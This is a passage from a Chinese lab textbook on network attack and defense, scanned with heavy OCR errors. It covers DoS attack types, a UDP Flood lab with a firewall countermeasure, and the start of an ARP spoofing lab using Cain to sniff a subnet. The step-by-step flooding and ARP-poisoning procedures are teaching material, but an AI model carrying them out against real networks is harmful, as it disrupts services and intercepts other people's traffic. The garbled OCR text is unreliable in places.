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本 书 是 (网 络 攻击 与 防御 技术 ) 的 配套 教材 ,( 网 络 攻击 与 防御 技术 ) 侧 重 于 理论 知识 的 讲 
解 ,而 本 书 主要 通过 具体 的 实验 ,对 涉及 到 的 一 些 关键 技术 的 应 用 进行 训练 ,使 读者 在 
加 强 对 理论 知识 的 理解 的 同时 ,提高 网 络 攻防 的 动手 能 力 。 

本 书 ( 包 括 主讲 教材 《网络 攻 击 与 防御 技术 》) 是 江苏 省 高 等 学 校 重 点 教材 ,从 立项 
之 初 到 最 后 成 书 ,期间 曾 几 易 其 稿 。 本 书 在 写作 过 程 中 主要 克服 了 以 下 的 困难 : 

一 是 实验 内 容 的 确定 。 实 验 内 容 必须 要 与 理论 知识 相对 应 ,并 能 够 恰当 地 反映 理 
论 知识 的 内 涵 和 外 延 。 由 于 每 一 章节 涉及 的 知识 点 较 多 ,而 要 做 到 实验 内 容 反 映 所 有 
的 知识 点 ,这 在 一 本 教材 的 编写 过 程 中 是 无 法 实现 的 。 为 此 ,本 书 每 章 六 选 了 一 些 典 型 
的 实验 ,力求 能 够 反映 核心 的 内 容 。 

二 是 实验 内 容 的 组 织 。 对 于 一 个 具体 的 实验 来 说 如 何 组 织 其 内 容 , 既 要 考虑 实验 
的 可 操作 性 ,还 要 关注 知识 点 之 间 的 有 效 衔接 。 为 了 达到 这 一 目的 ,本 书 的 每 个 实验 都 
包括 预备 知识 、 实 验 目 的 和 条 件 、 实 验 过 程 和 任务 与 思考 4 个 环节 ,在 突出 知识 掌握 的 
同时 ,加 强 对 能 力 的 拓展 。 

三 是 实验 环境 的 构建 。 为 了 能 够 使 每 一 位 读者 在 不 需要 依赖 第 三 方 平台 的 基础 上 
能 够 开展 每 一 个 实验 ,本 书 中 所 选择 的 实验 环境 都 可 以 由 读者 借助 互联 网 根据 实验 要 
求 自己 搭建 ,并 完成 实验 操作 。 

本 书 的 内 容 分 为 网 络 攻防 基础 实 训 、Windows 操作 系统 攻防 实 训 、Linux 操作 系统 攻防 
实 训 、 恶 意 代码 攻防 实 训 、Web 服务 器 攻防 实 训 、Web 浏览 器 攻防 实 训 和 移动 互联 网 应 用 攻 
防 实 训 7 曹 。 为 了 便于 教学 的 开展 ,本 书 每 一 草 的 内 容 与 4 网 络 攻击 与 防御 技术 ;一 一 对 应 。 

本 书 在 编写 过 程 中 得 到 了 许多 同事 和 同行 的 无 私 帮 助 和 文 持 ,在 项 目 申请 和 出 版 
过 程 中 得 到 了 清华 大 学 出 版 社 编辑 老师 的 关心 和 帮助 。 本 书 中 的 实验 内 容 由 北京 易 霖 
博信 息 技 术 有 限 公 司 提供 ,同时 在 编写 过 程 中 参考 了 大 量 的 文献 资料 。 其 中 ,第 1 章 到 
第 3 草 的 内 容 由 李 和 酝 娟 副教授 编写 ,第 4 章 和 第 5 草 由 徐 鹏 工程 师 编写 ,第 6 章 和 第 7 
章 由 王 群 教授 编写 ,同时 王 群 教授 负责 全 书 的 统 稿 工 作 , 刘 家 银 和 倪 雪 莉 老 师 负 责 全 书 
的 校对 。 对 资料 的 直接 提供 者 以 及 文献 资料 的 贡献 者 ,在 此 一 并 表示 衷心 的 感谢 ! 

由 于 作者 水 平 有 限 , 书 中 肯定 会 出 现 一 些 错误 和 不 足 , 敬 请 读者 提出 宝贵 意见 。 同 
时 ,本 书 的 作者 也 会 对 内 容 进 行 不 断 完善 ,适时 提供 新 的 版 本 。 
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针对 《网 络 攻 击 与 防御 技术 ?第 1 章 “ 网 络 攻防 技术 概述 ”的 内 容 , 使 读者 在 对 网 络 攻防 
基本 概念 、. 基 础 知识 和 实现 方法 有 了 一 定 了 解 的 基础 上 ,通过 本 章 的 具体 介绍 ,使 读者 对 攻 
防 实 训 环境 和 基本 的 攻防 实施 方法 有 所 认识 。 其 中 , 靶 机 (target drones) 原 指 军事 射击 训 
练 中 的 一 种 飞行 器 ,而 在 网 络 攻 防 环境 中 泛 指 被 攻击 的 对 象 ,攻击 机 则 是 对 目标 对 象 实施 攻 
击 行为 的 计算 机 。 


1.1 中 断 攻 击 : UDP Flood 拒绝 服务 攻击 与 防范 
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网 络 攻击 是 指 任 何 非 授 权 而 进入 或 试图 进入 他 人 计算 机 网 络 的 行为 ,是 入 侵 者 实现 人 
侵 目 的 所 采取 的 技术 手段 和 方法 。 这 种 行为 既 包 括 对 整个 网 络 的 攻击 ,也 包括 对 网 络 中 的 
服务 硕 、 防 火场 .路 由 希 等 单个 节点 的 攻击 ,还 包括 对 节点 上 运行 的 某 一 个 应 用 系统 或 应 用 
软件 的 攻击 。 根 据 攻击 实现 方法 的 不 同 , 可 以 分 为 主动 攻击 和 被 动 攻 击 两 种 类 型 。 

主动 攻击 是 指 攻击 者 为 了 实现 攻击 目的 ,主动 对 需要 访问 的 信息 系统 进行 非 授 权 的 访 
问 行为 。 例 如 ,通过 远程 登录 服务 硕 的 TCP 25 号 疹 口 搜索 正在 运行 的 服务 硕 信 息 ,在 T CP 
连接 建立 时 通过 伪造 无 效 IP 地 址 耗 尽 目标 主机 的 资源 等 。 主 动 攻 击 的 实现 方法 较 多 ,针对 
言 息 安 全 的 可 用 性 完整 性 和 真实 性 ,一 般 可 以 分 为 中 断 、 自 改 和 伪造 3 种 类 型 。 拒 绝 服务 
攻击 是 最 常见 的 中 断 攻 击 方式 , 除 此 之 外 ,针对 号 份 识 别 、 访 问 控 制 . 审 计 跟 踊 等 应 用 的 攻击 
也 属于 中 断 类 型 。 

DoS(Denial of Service ,拒绝 服务 攻击 ) 利 用 目标 系统 网 络 服务 功能 缺陷 或 直接 消耗 其 
系统 资源 ,使 得 该 目标 系统 无 法 提供 正 第 的 服务 。DDoS(CDistributed Denial of Service. 分 
布 式 拒绝 服务 攻击 ) 是 在 传统 的 DoS 攻击 基础 之 上 产生 的 一 类 攻击 方式 , 它 利 用 了 互联 网 
的 分 布 式 特征 ,将 分 散 的 攻击 源 集中 后 癌 目 标 主机 同时 发 起 攻击 。 单 一 的 DoS 攻击 一 般 采 
用 一 对 一 的 方式 , 当 攻 击 目标 主机 的 CPU 利用 率 升 高 .内 存 减 小 或 网 络 市 宽 变 小 时 ,可 能 
RÆ T DoS/DDos 攻击 。 

随 独 计算 机 与 网 络 技术 的 发 展 ,计算 机 的 处 理 能 力 迅速 增 长 ,内存 空 间 明 显 增 加 ,同时 
也 出 现 了 万 兆 级 别 甚至 更 高 带宽 的 网 络 , 这 使 得 DoS 攻击 的 困难 程度 增 大 ,目标 对 象 对 恶 
意 攻击 数据 包 的 “消化 能 力 ” 不 断 加 强 。 例 如 ,攻击 软件 每 秒 可 以 发 送 3000 个 攻击 包 , 但 被 
攻击 对 象 的 主机 与 网 络 带 宽 每 秒 可 以 处 理 10 000 个 攻击 包 , 在 这 种 情况 下 ,即使 发 生 了 攻 
击 ,也 不 会 产生 什么 效果 。 此 时 ,分 布 式 拒绝 服务 攻击 (DDoS) 便 发 挥 了 其 优势 。 

读者 在 理解 了 Dos 攻击 原理 后 ,对 DDoS 攻击 的 原理 便 很 容易 和 掌握。 对 于 某 一 被 攻击 
主机 说 ,如 果 一 台 攻 击 机 实施 攻击 时 无 法 发 挥 作用 ,那么 用 10 台 、100 台 甚 至 是 更 多 的 攻击 
BLUE? DDoS 就 是 利用 更 多 的 倪 仿 机 发 起 进攻 ,以 比 从 前 更 大 的 规模 进攻 受害 者 。 
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从 防范 的 角度 看 , 随 痢 服务 硕 端 处 理 任务 的 日 益 复 杂 及 网 站 访问 量 的 迅速 增长 ,服务 需 
性 能 的 优化 也 成 了 非常 迫切 的 任务 。 在 优化 之 前 ,最 好 能 够 测试 一 下 不 同 条 件 下 服务 需 的 
性 能 表现 。 

T IL DoS 拒绝 服务 攻击 方式 包括 以 下 5 种 。 

1. Smurf 攻击 


Smurf 攻击 结合 了 IP 欺骗 和 ICMP 回复 方法 ,通过 产生 大 量 ICMP 应 答 数 据 包 ,导致 
被 攻击 主机 网 络 发 生 拥 堵 。Smnurf 的 攻击 过 程 为 : 攻击 者 首先 确定 一 个 与 互联 网 相 联 的 同 
时 拥有 大 量 主 机 的 网 络 ( 某 一 IP 网 段 ) ,然后 回 该 网 络 的 广播 地 址 (如 201. 10. 129. 255 ) 发 
送 一 个 欺骗 性 Ping 分 组 (echo 请 求 分 组 ) ,这 个 目标 网 络 ( 如 201. 10. 129. 0) 被 称 为 反弹 站 
点 ,而 欺骗 性 Ping 分 组 的 源 地 址 就 是 攻击 者 已 确定 的 被 攻击 系统 。 被 确定 的 IP 网 段 中 的 
所 有 主机 在 收 到 Ping 分 组 后 ,都 会 向 欺骗 性 Ping 分 组 的 IP 地 址 (被 攻击 系统 ) 发 送 echo 
响应 报 文 。 如 果 目 标 网 络 拥 有 较 大 的 IP 地 址 段 ,就 会 产生 大 量 的 echo 啊 应 报 文 ,被 攻击 的 
目标 系统 很 快 就 会 被 大 量 的 echo 啊 应 报 文 看 没 , 从 而 引起 DDoS 攻击 。 

2. Land 攻击 


当 客 户 端 尝试 与 服务 器 建立 TCP 连接 时 ,正常 情况 下 客户 端 与 服务 器 端 需要 交换 一 系 
列 信息 。 

(D 客户 端 通过 发 送 SYN 同步 报 文 到 服务 器 ,请 求 建立 连接 。 

(2) 服务 器 响应 客户 端 SYN-ACK ,以 响应 ACK 请 求 。 

(3) 客户 端 应 答 ACK ,TCP 会 话 连接 建立 。 

以 上 过 程 , 即 TCP 三 次 握手 , 它 是 每 个 TCP 连接 建立 时 首先 要 完成 的 操作 。 

在 Land 攻击 中 ,攻击 者 利用 一 个 特殊 构造 的 SYN 报 文 ,该 报 文 的 源 地 址 和 目标 地 址 
都 被 设置 成 被 攻击 对 象 的 地 址 ,然后 采用 该 SYN 报 文 进行 攻击 。Land 攻击 将 导致 被 攻击 
对 象 癌 自己 的 地 址 发 送 SYN-ACK 报 文 , 结 果 这 个 地 址 又 发 回 ACK 报 文 并 创建 一 个 空 连 
接 ,每 一 个 这 样 的 连接 都 将 保留 直到 超时 ,以 此 消耗 资源 。 

3. Teardrop 攻击 


Teardrop 攻击 是 利用 UDP 的 错误 分 片 数据 包 实现 攻击 过 程 。Teardrop 攻击 的 实现 原 
理 为 : 攻击 者 向 被 攻击 对 象 发 送 多 个 经 过 事先 构造 的 分 片 IP 数据 报 , 每 个 经 分 片 的 IP 数 
据 报 中 包含 该 分 片 属于 哪个 原始 数据 报 , 以 及 在 原始 数据 报 中 的 位 置 等 信息 。 由 于 互联 网 
中 的 路 由 器 对 IP 分 片 不 会 进行 重组 ,被 分 片 后 IP 数据 的 重组 在 目标 主机 上 完成 。 攻 击 者 
如 果 通 过 精心 设计 ,将 一 个 原始 IP 数据 报 分 片 成 多 个 IP AH SH. IP rH zm Bl ffe SUE 
的 “段位 移 ”( 假 设 原始 数据 报 中 的 第 3 个 IP 分 片 的 “段位 移 ” 小 于 第 2 个 IP 分 片 结束 的 “ 段 
位 移 ”, 而 且 加 上 第 3 个 卫 分 片 中 的 数据 ,也 未 超过 第 2 个 IP 分 片 的 尾部 ,这 就 在 第 2 个 IP 
分 片 与 第 3 个 IP 分 片 之 间 产 生 了 重合), 这 时 , 当 某 些 操 作 系 统 收 到 含有 重生 “有 段 位移” 的 
IP 分 片 时 将 会 出 现 系统 月 演 、 重 启 等 现象 。 

4. Ping of Death 攻击 


Ping of Death 攻击 即 通常 所 讲 的 “死亡 之 Ping”。 这 种 攻击 利用 绝 大 多 数 网 络 设备 和 
系统 所 支持 的 网 络 连 通 性 测试 功能 ,利用 Ping 工具 提供 的 可 动态 调整 ICMP 报 文大 小 的 特 
征 ,攻击 者 向 被 攻击 对 象 发 送 大 于 65 536B 的 ICMP 报 文 ,使 被 攻击 对 象 的 操作 系统 骨 溃 。 
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通常 情况 下 ,Ping 工具 不 可 以 发 送 大 于 65 536B 的 ICMP 报 文 ,但 可 以 把 该 ICMP 报 文 
分 割 成 多 个 IP 分 片 ,然后 在 目标 主机 上 重组 。 在 分 片 重组 过 程 中 导致 被 攻击 目标 缓冲 区 淤 
出 ,引起 拒绝 服务 攻击 。 

5. SYN Flood 攻击 


SYN Flood 攻击 利用 TCP 三 次 握手 实现 ,攻击 者 使 用 无 效 IP 地 址 向 被 攻击 主机 发 送 
大 量 伪造 源 地 址 的 TCP SYN 报 文 ,被 攻击 主机 在 收 到 该 TCP SYN 报 文 后 ,会 分 配 必要 的 
资源 ,然后 癌 源 地 址 返回 SYN-ACK 报 文 , 并 等 待 源 主机 返回 ACK 报 文 。 如 果 伪 造 的 源 地 
址 主机 处 于 活跃 状态 ,将 会 返回 一 个 RST 报 文 直接 关闭 连接 ,但 大 部 分 伪造 源 地 址 是 非 活 
跃 的 ,这 种 情况 下 源 地 址 永远 无 法 返回 ACK 报 文 ,被 攻击 主机 继续 发 送 SYN-ACK 报 文 ， 
并 将 半 开 连接 放 入 端口 的 积压 队列 中 ,虽然 一 般 的 主机 都 有 超时 机 制 和 默认 的 重 传 次 数 , 但 
是 由 于 端口 半 连 接 队 列 的 长 度 有 限 ,如 果 不 断 地 回 被 攻击 主机 发 送 大 量 的 TCP SYN RX, 
半 开 连接 队列 就 会 很 快 填 满 ,被 攻击 主机 也 就 拒绝 新 的 连接 ,导致 该 端口 无 法 啊 应 其 他 客户 
端 进行 的 正常 连接 请 求 ,最终 使 被 攻击 主机 被 拒绝 服务 。 


1.1.2 实验 目的 和 条 件 


1. 实验 目的 
通过 本 实验 ,使 读者 在 学 习 DoS/DDoS 攻击 实现 原理 和 过 程 的 基础 上 ,结合 防火 墙 应 
用 ,掌握 相关 的 防御 方法 。 
2. 实验 条 件 
本 实验 所 需要 的 软 人 硬件 清单 如 表 1-1 所 示 。 
表 1-1 UDP Flood 拒绝 服务 攻击 与 防范 实验 清单 


量 1 台 
ER 
天 

Rh | —3 | MERE ”| X 
Coo o O O [77 EX 


1.1.3 实验 过 程 


1. 使 用 UDP Flood 程序 向 靶 机 服务 器 发 送 UDP 包 

步骤 1. 获取 本 实验 所 需要 的 工具 UDP Flood, 运 行 后 打开 如 图 1-1 所 示 的 操作 界面 。 
(D IP/hostname: 输入 实验 中 靶 机 服务 需 使 用 的 IP 地 址 。 

© Port; 输入 端口 号 ,本 实验 使 用 默认 端口 445, 

(3 Max duration(secs) : 输入 一 个 最 大 的 发 包 量 ,如 600, 

由 Speed: 选择 网 络 连接 方式 ,本 实验 为 局 域 网 ,所 以 选择 LAN 选项 。 

之 后 , 单 击 Go 按钮 ,开始 发 包 。 
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: UDP Flooder 2.00 — IP: 192 Is E: 


** UDP Flood. Server stress test **** | 


1-1 UDP Flood 工具 操作 界面 


步骤 2: 登录 防火 墙 , 单 击 “ 日 志 ” 标 签 ,在 打开 的 如 图 1-2 所 示 的 防火 墙 日 志 列 表 中 可 
以 查看 到 大 量 的 来 自 同一 个 IP 地 址 ( 即 攻击 机 的 IP 地 址 ) 的 UDP 包 。 其 中 ,本 机 端口 是 
445.3f HX UDP 包 是 允许 通行 的 。 


1-2 防火 墙 日 志 信 息 


步骤 3: 在 攻击 机 上 单 击 UDP Flood 程序 界面 上 的 Stop 按钮 ,停止 发 包 , 但 注意 不 要 
关闭 该 程序 。 

2. 设置 防火 墙 规则 禁止 UDP 包 通 过 

步骤 1: 单 击 防火 墙 的 “ 自 定 义 IP 规则 ”管理 标签 ,打开 如 图 1-3 所 示 的 IP 规则 管理 
界面 。 

步骤 2: 单 击 * 增 加 规则 ”图标 ,打开 如 图 1-4 所 示 的 “修改 IP 规则 ”操作 界面 。 

(D 名 称 : 输入 一 个 名 称 , 如 deny udp. 
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O 数据 包 方 向 : 选择 
© 对 方 IP 地 址 


IP 地 址 。 


告 " 复 选 框 。 


"后面 输入 刚才 在 日 志 中 看 到 的 
记录 ”和 “ 警 


é 
éé 


选中 


AO 


La 


H «E Jb TE gu 
选择 "拦截 ?选项 ,并 


选择 
: 选择 UDP 选项 。 


(D 数据 包 协 议 类 型 
© 当 满足 上 面条 件 时 
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当 以 上 参数 和 选项 设置 好 后 , 单 击 “ 确 定 ” 按 钮 ,返回 规则 管理 界面 。 

步骤 3. 在 规则 管理 界面 中 ,选择 在 步骤 2 中 添加 的 规则 ,然后 单 击 该 规则 将 其 图 标 上 
移 ,使 其 处 于 UDP 协议 规则 的 最 上 面 ,并 进行 保存 。 

步骤 4: 返回 攻击 机 ,进入 UDP Flood 程序 界面 , 单 击 Go 按钮 ,重新 开始 发 包 。 

步骤 5: 返回 防火 墙 操 作 界 面 ,再 次 打开 防火 墙 日 志 。 此 时 会 发 现 , 日 志 中 记录 的 该 IP 
发 送 的 UDP 状态 显示 为 “该 包 被 拦截 ”, 如 图 1-5 所 示 。 


了 大 网 防火 增 个 人 版 


本 


PE € ——— — — w—  -— —  - a uero e a ratuns ri POTERIT 
"um m 0 Um Lm FT 0 INI ttt tut mrt rat aru utum rut utn rut unu natur unatatutatatute ta tututa! 


OUR 


1-5 防火 墙 日 志 中 显示 已 被 拦截 的 UDP 数据 包 


1.1.4 任务 与 思考 


针对 DDoS 攻击 ,目前 基于 目标 计算 机 系统 的 防范 方法 主要 有 网 关 防 范 、 路 由 硕 防 范 和 
主机 防范 3 种 类 型 。 在 这 3 种 类 型 中 ,网 关 防 范 较 为 常见 ,而 且 应 用 效果 较 好 。 

网 关 防 范 是 指 利 用 专门 技术 和 设备 在 网 关上 防范 DDoS 攻击 , 它 主要 采用 的 技术 有 
SYN Cookie 方法 、 基 于 IP 访问 记录 的 HIP 方法 和 客户 计算 瓶颈 方法 等 。 

(1) SYN Cookie, SYN Cookie 对 TCP 服务 器 端的 三 次 握手 做 了 一 些 修 改 ,是 专门 用 
来 防范 SYN Flood 攻击 的 一 种 手段 。SYN Cookie 的 工作 原理 为 . 在 TCP 服务 颖 接收 到 
TCP SYN 包 并 返回 TCP SYN 十 ACK 包 时 ,不 是 分 配 一 个 专门 的 数据 区 ,而 是 根据 这 个 
SYN 包 计 算出 一 个 Cookie 值 , 且 这 个 Cookie 作为 将 要 返回 的 SYN ACK 包 的 初始 序列 号 。 
例如 , 当 客 户 端 返回 一 个 ACK 包 时 ,根据 数据 包头 部 信息 计算 Cookie, 与 返回 的 确认 序列 
号 (初始 序列 号 十 1) 进 行 对 比 , 如 果 相 同 , 则 是 一 个 正常 连接 ,然后 分 配 资源 ,建立 连接 。 

(2) 基于 IP 访问 的 HIP 方法 。HIP(Host Identity Protocol, 主 机 标识 协议 ) 方 法 采用 
行为 统计 方法 区 分 攻击 包 和 正常 包 , 对 所 有 访问 IP 建立 信任 级 别 。 当 发 生 DDoS 攻击 时 ， 
信任 级 别 高 的 IP 有 优先 访问 权 , 从 而 解决 了 识别 问题 。 

(3) 客户 计算 瓶颈 方法 。 客 户 计算 瓶颈 方法 是 指 将 访问 时 的 资源 瓶颈 从 服务 需 端 转移 
到 客户 端 ,从 而 大 大 提升 DDoS 的 代价 。 客 户 计算 瓶颈 方法 协议 复杂 ,需要 对 现 有 操作 系统 
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和 网 络 结构 进行 较 大 的 变动 ,这 也 在 很 大 程度 上 影响 了 该 方法 的 可 操作 人 性。 
另外 ,有 关 路 由 天 防 范 和 主机 防范 方面 ,读者 可 参阅 相关 文献 。 


1.2 XP li: ARP 欺骗 攻击 


1.2.1 预备 知识 : ARP 欺骗 攻击 


1. ARP 协议 

ARP( Address Resolution Protocol, 地 址 解析 协议 ) 用 于 将 计算 机 的 网 络 地 址 (32 位 IP 
地 址 ) 转 化 为 物理 地 址 (48 位 MAC 地 址 ) 。ARP 协议 是 属于 数据 链 路 层 的 协议 ,在 以 太 网 
中 的 数据 帧 从 一 台 主 机 到 达 同 一 网 段 内 的 另 一 台 主 机 是 根据 以 太 网 地 址 (硬件 地 址 ?确定 接 
口 的 ,而 不 是 根据 IP 地 址 。 除 点 对 点 的 连接 之 外 ,内 核 (如 驱动 ) 必 须知 道 目 的 端的 硬件 地 
址 才能 发 送 数据 。 

2. ARP 攻击 原理 

由 于 ARP 协议 在 设计 中 存在 主动 发 送 ARP 报 文 的 漏洞 ,使 得 主机 可 以 发 送 虚 假 的 
ARP 请 求 报 文 或 响应 报 文 , 报 文中 的 源 IP 地 址 和 源 MAC 地 址 均 可 以 进行 伪造 。 在 局 域 
网 中 , 既 可 以 伪造 成 某 一 人 台 主 机 (如 服务 器 ) 的 IP 地 址 和 MAC 地 址 的 组 合 , 也 可 以 伪造 成 
网 关 的 IP 地 址 和 MAC 地 址 的 组 合 , 等 等 。 这 种 组 合 可 以 根据 攻击 者 的 意图 进行 任意 搭 
配 , 而 现 有 的 局 域 网 中 却 没 有 相应 的 机 制 和 协议 防止 这 种 伪造 行为 。 近 几 年 来 ,局 域 网 中 的 
ARP 欺骗 已 经 泛滥 成 灾 , 几乎 没有 一 个 局 域 网 未 遭遇 过 ARP 欺骗 的 侵害 。 


1.2.2 实验 目的 和 条 件 


1. 实验 目的 
过 该 实验 ,使 读者 对 IP 网 络 中 某 一 网 段 主 机 之 间 ed 
ARP poppe 在 此 基础 上 ,进一步 掌握 ARP 欺骗 攻击 的 防范 
方法 。 


2. 实验 清单 及 软 硬 件 要 求 
本 实验 所 需要 的 软 人 硬件 清单 如 表 1-2 所 示 。 


X 1-2 ARP 欺骗 攻击 与 防范 实验 清单 


| 1 | XR | 1 

san [2 | RMERREE OO Winds XPHT 
Cain 
1f 

m 操作 系统 版 本 Windows XP 以 上 


NENNEN EN 软件 版 本 X 
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1.2.3 实验 过 程 


步骤 1: 登录 靶 机 获取 本 机 MAC 地 址 。 正 常 登录 靶 机 后 ,选择 “运行 ”命令 ,在 打开 的 
对 话 框 中 输入 “cmd” 命 令 , 打 开 命 令 提 示 符 窗口 。 在 窗口 中 分 别 输 入 “ipconfig” 和 “arp -a” 
命令 ,在 打开 的 对 话 框 中 显示 了 本 机 的 IP 地址 MAC 地 址 等 网 络 配置 信息 ,如 图 1-6 所 示 。 


c* C: AWINDOWSAsysten32Xcnd. exe 


*NDocuments and SettingsMdministrator»5ipconfig 


lindovs IP Configuration 


Ethernet adapter 本 地 连接 : 


Connection-specific DNS Suffix 

IF Nd 4-252 uu BE/L292.100.1.,1B07 
: 255.255.255.0 
: 192.168.1.1 


:NDocuments and Settings Mlidministrator^5arp -a 


Interface: 192.168.1.187 ——— 8x18883 

Internet fiddress Physical Address T ype 

192.168.1. 54-e6-fc-69-d2-77 dynamic 
192.168.1. að-f4-50-f?9-15-7d dynamic 
192.168.1. 00-21-5d-98-dc-36 dynamic 
192.168.1. ec-a8-6b-2d-39-9a dynamic 
192.168.1. d4-28-6d-f5-4f -93 dynamic 
192.168.1. 6c-98-37-£f b-2a-8a dynamic 
192.168.1.191 6c-da-d6-63-25-5f dynamic 


:NDocuments and Settings Midministrator? 


图 1-6 运行 “ipconfig” 和 “arp -a” 命 令 后 的 显示 结果 


步骤 2: 登录 攻击 机 ,运行 Cain 工具 (需要 事先 安 站 ) ,打开 如 图 1-7 所 示 的 Cain 工具 操 


File View Configure Tools Help 
3d) OARE tO ww Rs mmRHBOS€EZO0?? hn 
| 


Z Cached Passwords 
8 Protected Storage Press the + button on the toolbar to dump the Protected Storage 
E | LSA Secrets 
Qi Wireless Passwords 
e IET Passwords 
e Windows Mail Passwords 
n Dialup Passwords 
[== Edit Boxes 
fis Enterprise Manager 
他 Credential Manager 


Wy Protected Storage 


http://www. oxid. it 


EU 


图 1-7 Cain 工具 操作 窗口 
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步骤 3: 单 击 Configure XHW , fe 3T F HY XT WSHE P EC Sniffer 选项 卡 ,打开 如 图 1-8 
所 示 的 对 话 框 , 在 其 中 选择 本 机 的 网 卡 ,并 进行 绑 定 ,然后 单 击 “确定 "按钮 ,返回 Cain 工具 
操作 窗口 。 


Configuration Dialog 
Decoders Sni 
& : Filters and ports | HTTP Fields | Traceroute | 


È Cached Passwords Certificate Spoofing | Certificates Collector | 
Protected Storage Sniffer | APR ( Arp Poison Routing ) | Challenge Spoofing | 
-一 LSA Secrets 
igi Wireless Passwords Subnet Mask 
e IET Passwords 7 MDevi ce to 192. 168.1. 186 255. 255. 255.1 
2» Windows Mail Passwords Mg DeviceWWPF Generi... 0.0.0.0 0.0.0.0 
| Dialup Passwords 
-P= Edit Boxes 
由 Enterprise Manager 
Credential Manager «i m | ull 


Winpcap Version 
« 1. 0. 2001 
DM Network Adapter | 


WARNING !!! Only ethernet adapters supported 


Üptions 
[ Start Sniffer on si | Don't use Promiscuous mode 
[ Start APR on star: 


3 Protected Storage 


http://www. oxid it 


ILA5 
d FEU 
B ADA EI 


1-8 选择 本 机 网 卡 并 进行 绑 定 


说 明 : 如 果 在 一 台 物 理 机 上 安装 了 虚拟 机 ,在 图 1-8 所 示 的 对 话 框 中 将 会 存在 多 个 网 
卡 ( 有 些 物理 机 本 号 安装 有 多 块 网 卡 )。 这 时 ,就 需要 选取 本 机 的 网 卡 ,并 为 其 绑 定 IP 地 址 。 
其 中 ,网 卡 的 选择 根据 所 要 咒 探 的 IP 地 址 的 范围 决定 。 

步骤 4: 在 图 1-8 所 示 的 对 话 框 中 选取 Filters and ports 选项 卡 , 打 开 如 图 1-9 所 示 的 
对 话 框 ,在 其 中 选取 咒 探 的 协议 类 型 和 对 应 的 端口 号 。 

步骤 5: 在 图 1-8 所 示 的 对 话 框 中 选取 APR(Arp Poison Routing) 选 项 卡 ,打开 如 图 1-10 
所 示 的 对 话 框 ,在 其 中 设置 在 吕 探 时 所 使 用 的 本 机 IP 地 址 和 MAC 地 址 。 这 里 既 可 以 选择 
使 用 本 机 的 真实 IP 地 址 和 MAC 地 址 (Use Real IP and MAC address) ,也 可 以 选择 使 用 伪 
装 的 IP 地 址 和 MAC 地址 (Use Spoofed IP and MAC address)。 如 果 选 择 使 用 伪装 的 IP 
地 址 和 MAC 地 址 ,可 以 填写 事先 设 定 的 IP 地 址 及 MAC 地 址 ,这 样 ,在 之 后 的 欺骗 中 即使 
被 发 现 ,也 难以 追溯 到 真实 主机 。 设 置 好 相应 参数 后 , 单 击 “ 确 定 ” 按 钮 ,返回 Cain 主 窗口 。 

步骤 6: 单 击 Start/Stop Sniffer 按钮 ,再 单 击 Add to List 按钮 ,在 打开 的 对 话 框 中 设 
LER PES E ROSE AR RED 1-11 所 示 。 本 实验 选择 对 整个 局 域 网 进行 哈 探 ,所 以 选中 AT 
hosts in my subnet 单 选 按钮 。 单 击 OK 按钮 后 返回 Cain 主 窗 口 ,在 Cain XE f O bz iR 
探 过 程 的 进度 ,如 图 1-12 所 示 。 
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View Configure Tools Help 


Á... EE 
B Tecoiers [9 yes Tis 


Certificate Spoofing | Certificates Collector 


地 Cached Passwords Sniffer | APR ( Arp Poison Routing ) | Challenge Spoofing | 
Protected Storage Filters and ports | HTTP Fields | Traceroute | 


LSA Secrets 

i Wireless Passwords UDF Ports 
i e IET Passwords [7] FTF 

i z Windows Mail Passwords [7] HTTP 


Dialup Passwords [v] HTTPS 
[= Edit Boxes 


Enterprise Manager 


Proxy 

FTPS 

POP3S 

IMAPS 

IMAP 

LDAP 

[v] LD4PS 

SIPS 

POP3 110 
SMTP 25 


Ml NNTP 119 v 
«ei T | i» 


Select All | Clear All | Defaults | 


Credential Manager 


My Protected Storage 


http://www. oxid. it 


, TT. 7 


s AA - ) . O £o o9 15:18 


1-9. 选取 嗅 探 的 协议 类 型 和 端口 号 


View Configure Tools Help 


—————————  —emn 
Decoders 
& - LES Certificate Spoofing | Certificates Collector 


地 Cached Passwords Filters and ports | HITP Fields | Traceroute 
i Protected Storage Sniffer APR ( Arp Poison Routing ) | Challenge Spoofing | 
LSA Secrets 
— i Wireless Passwords Spoofing Üptions 


E RID LI (* Use Real IP and MAC address: 


Windows Mail Passwords (C Use Spoofed IP and MAC address 
Dialup Passwords 


i [zx Edi t Boxes > U i U U à A 001 122 33 4 455 
Enterprise Manager 
Credential Manager [E treten 


[v Pre-Poison ARP caches ( Create ARP us 


Poisoning 


Poison remote ARP caches 30 m- seconds 


(* Use ARP Reply Packets 
(^ Use ARP Request Packets More Network Traffic) 


S Protected Storage 


http://www. oxid. it 


TT A 
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1-10 MÆ APR 选项 


View Configure Tools Help 


EnZIDE LIES: 
FEERSHE ESTIDHD ES: NAC Address Scanner E ues JE wer] | 


192. 168. 1. 126 
192. 168. 1. 133 
192. 168. 1. 117 
192. 168. 1. 102 


D4206DF54F93 
1CBO09442ABCC 
188T961T04CC 
ADF450F915TD 


Target 
(* All hosts in my subnet 
C Range 


m Promiscuous-Mode Scanner 

[^ ARP Test (Broadcast 31-bit) 
[^ ARP Test (Broadcast 16-bit) 
[^ ARP Test (Broadcast 8-bit) 
[^ ARP Test (Group bit) 

[ ARF Test (Multicast group 0) 
[ ARP Test (Multicast group 1) 
[ ARP Test (Multicast group 3) 
[ Al Tests 


co o® 15:24 


1-11 选取 嗅 探 对 象 


View Configure Tools Help 


D4206DF54F933 
1CB09442ABCC 
188T951T04CC 
ADFASOF915TD 
SAEGFCO9D2TT 
TAEASAA4BA12A 
C83A351E53C0 
E005C530D3F6 
OO023CD3BF2C4 
0025906TB3F8 
OOEDOFC82B81 
B87074298548 
FCABBP2D428C 
ECA86B2D4462 
O0238BF1FTB3 
OO026SEET62GE 
DO01FE210F49A 
ECAS6B2D4467 
002618010509 
ECAG6B2D399A 
BÜEBESTFAACF 
0025116TCE64 
002154566479 
ECA86B2D4461 
OO0ED4COBGPTS 
BCTF2F91A4B6 
00218865A130E 
O010C8B0535C 


TP-LINK TECHNOLOGIES CO... 
TP-LINK Technologies Co... 
Tenda Technology Co., Ltd 


Scanning MAC addresses 


Current Host: 


192. 188. 1. 209 


m————Á»'À1 Cancel | 


ASUSTek COMPUTER INC. 
Quanta computer Inc. 
ELITEGROUP COMPUTER SYS... 
Hewlett Packard 

REALTEK SEMICONDUCTOR C... 


Universal Global Scient.. 
Universal Global Scient.. 


